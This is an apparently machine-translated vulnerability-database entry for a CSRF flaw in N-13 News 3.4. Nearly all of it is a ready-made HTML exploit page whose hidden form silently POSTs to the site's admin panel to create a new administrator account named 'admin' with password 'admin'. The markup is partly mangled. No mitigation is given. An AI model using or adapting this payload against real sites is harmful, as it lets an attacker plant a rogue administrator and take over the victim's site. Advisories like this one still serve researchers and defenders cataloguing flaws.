N - 1 3 news 3.4 remote admin add CSRF vulnerability-vulnerability warning-the black bar safety net

2011-01-20T00:00:00
ID MYHACK58:62201128894
Type myhack58
Reporter 佚名
Modified 2011-01-20T00:00:00

Description

EXP: the <html> <head> <title>Remote Admin Add CSRF Exploit</title> </head> <H2>Remote Admin Add CSRF Exploit by qing-Edit</H2> <formmethod="POST"name="form0"action="http://localhost/news/admin.php?action=options&mod=accounts&create=new"> <inputtype="hidden"name="accountname"value="admin" /> <inputtype="hidden"name="accountemail"value="admin@local.com" /> <inputtype="hidden"name="accountpassword1"value="admin" /> <inputtype="hidden"name="accountpassword2"value="admin" /> <inputtype="hidden"name="accountaccesslevel"value="1" /> <inputtype="hidden"name="S1"value="Save" /> </form> <formmethod="GET"name="form1"action="http://localhost/news/js/main.php"> <inputtype="hidden"name="name"value="value" /> </form>

</body> </html>

Program official download: http://www.network-13.com/